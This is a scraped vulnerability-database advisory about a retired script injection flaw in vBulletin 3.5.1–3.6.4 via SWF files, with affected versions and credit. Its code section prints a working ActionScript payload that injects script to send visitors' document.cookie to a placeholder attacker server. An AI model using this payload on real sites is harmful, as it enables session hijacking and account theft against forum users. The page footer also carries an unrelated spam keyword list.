about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , RETIRED: VBulletin SWF Script Injection Vulnerability


Title RETIRED: VBulletin SWF Script Injection Vulnerability
Published 2006-12-25-12:00AM
Updated 2007-01-04-06:26PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Discovery is credited to Ashraf Morad.
Vulnerable  VBulletin VBulletin 3.6.4
VBulletin VBulletin 3.6.3
VBulletin VBulletin 3.6.2
VBulletin VBulletin 3.6.1
VBulletin VBulletin 3.6
VBulletin VBulletin 3.5.4
VBulletin VBulletin 3.5.3
VBulletin VBulletin 3.5.2
VBulletin VBulletin 3.5.1
Not Vulnerable  
Code   The following example was provided:

getURL("javascript:function blab(){}var scriptNode =
+document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie
+;blab();");
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 19:42:19 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
cdh3c.cn chango myhotsite. www..depta IGRE WWW.SEX SE WWW.6VEDIO lo124l gbook.php% Www.Pinkse sex amatur Vip sex ho News Searc luu diec p video girl sex18 norton log deepika linux2.2.1 edgy trisha PIC Melly pait wwwxxlcom tamil nake vB 3.6.2 ilayana 200 /compo Thrisha se WWW.6VEDIO malika seh joomla rem webged ccv japanese s access WWW.SEX SE prasanttam miguel te Www.sex400 Panjabsex Artisindon Vdeu sex t975t VTUNNEL.CO news for c ifeelmysel wwwsax.com t783t com_report sun one